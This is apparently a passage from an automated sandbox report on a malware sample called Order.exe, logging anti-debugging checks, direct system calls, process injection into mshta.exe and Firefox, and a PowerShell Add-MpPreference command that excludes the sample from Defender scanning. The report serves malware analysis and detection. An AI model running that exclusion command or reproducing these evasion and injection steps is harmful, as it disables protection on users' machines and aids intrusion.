                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01962835 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01962835 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01962835 mov ecx, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01962835 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01962835 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019E483A mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019E483A mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0197A830 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01970854 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01944859 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01944859 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01952840 mov ecx, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019D6870 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019D6870 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019CE872 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019CE872 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01950BBE mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01950BBE mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019F4BB0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019F4BB0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019EEBD0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01940BCD mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01940BCD mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01940BCD mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01960BCB mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01960BCB mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01960BCB mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01948BF0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01948BF0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01948BF0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0196EBFC mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019CCBF0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01A08B28 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01A08B28 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01A14B00 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0196EB20 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0196EB20 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01938B50 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019EEB50 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019F4B4B mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019F4B4B mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019E8B42 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019D6B40 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019D6B40 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01A0AB40 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0193CB7E mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01A12B57 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01A12B57 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01A12B57 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01A12B57 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01978A90 mov edx, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01A14A80 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01948AA0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01948AA0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01996AA4 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01940AD0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01974AD0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01974AD0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01996ACC mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01996ACC mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01996ACC mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0197AAEE mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0197AAEE mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019CCA11 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01964A35 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01964A35 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0197CA24 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0196EA2E mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Process token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\Order.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe"
                  Source: C:\Users\user\Desktop\Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe"
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtClose: Direct from: 0x76F02B6C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtCreateKey: Direct from: 0x76F02C6C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtSetInformationThread: Direct from: 0x76F02B4C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtOpenSection: Direct from: 0x76F02E0C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtSetInformationThread: Direct from: 0x76EF63F9
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtCreateFile: Direct from: 0x76F02FEC
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtOpenFile: Direct from: 0x76F02DCC
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtTerminateThread: Direct from: 0x76F02FCC
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtUnmapViewOfSection: Direct from: 0x76F02D3C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtCreateMutant: Direct from: 0x76F035CC
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtResumeThread: Direct from: 0x76F036AC
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtReadFile: Direct from: 0x76F02ADC
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtDelayExecution: Direct from: 0x76F02DDC
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtResumeThread: Direct from: 0x76F02FBC
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | NtCreateUserProcess: Direct from: 0x76F0371C
                  Source: C:\Users\user\Desktop\Order.exe | Memory written: C:\Users\user\Desktop\Order.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\Order.exe | Section loaded: NULL target: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe protection: execute and read and write
                  Source: C:\Users\user\Desktop\Order.exe | Section loaded: NULL target: C:\Windows\SysWOW64\mshta.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: NULL target: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe protection: read write
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: NULL target: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                  Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\mshta.exe | Thread register set: target process: 7100
                  Source: C:\Windows\SysWOW64\mshta.exe | Thread APC queued: target process: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                  Source: C:\Users\user\Desktop\Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe"
                  Source: C:\Users\user\Desktop\Order.exe | Process created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"
                  Source: C:\Users\user\Desktop\Order.exe | Process created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe | Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"
                  Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: mkvfHfXifKJWp.exe, 00000007.00000000.1815526970.0000000001581000.00000002.00000001.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 00000007.00000002.4143739909.0000000001581000.00000002.00000001.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144032980.0000000000C91000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                  Source: mkvfHfXifKJWp.exe, 00000007.00000000.1815526970.0000000001581000.00000002.00000001.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 00000007.00000002.4143739909.0000000001581000.00000002.00000001.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144032980.0000000000C91000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                  Source: mkvfHfXifKJWp.exe, 00000007.00000000.1815526970.0000000001581000.00000002.00000001.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 00000007.00000002.4143739909.0000000001581000.00000002.00000001.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144032980.0000000000C91000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                  Source: mkvfHfXifKJWp.exe, 00000007.00000000.1815526970.0000000001581000.00000002.00000001.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 00000007.00000002.4143739909.0000000001581000.00000002.00000001.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144032980.0000000000C91000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Users\user\Desktop\Order.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Order.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
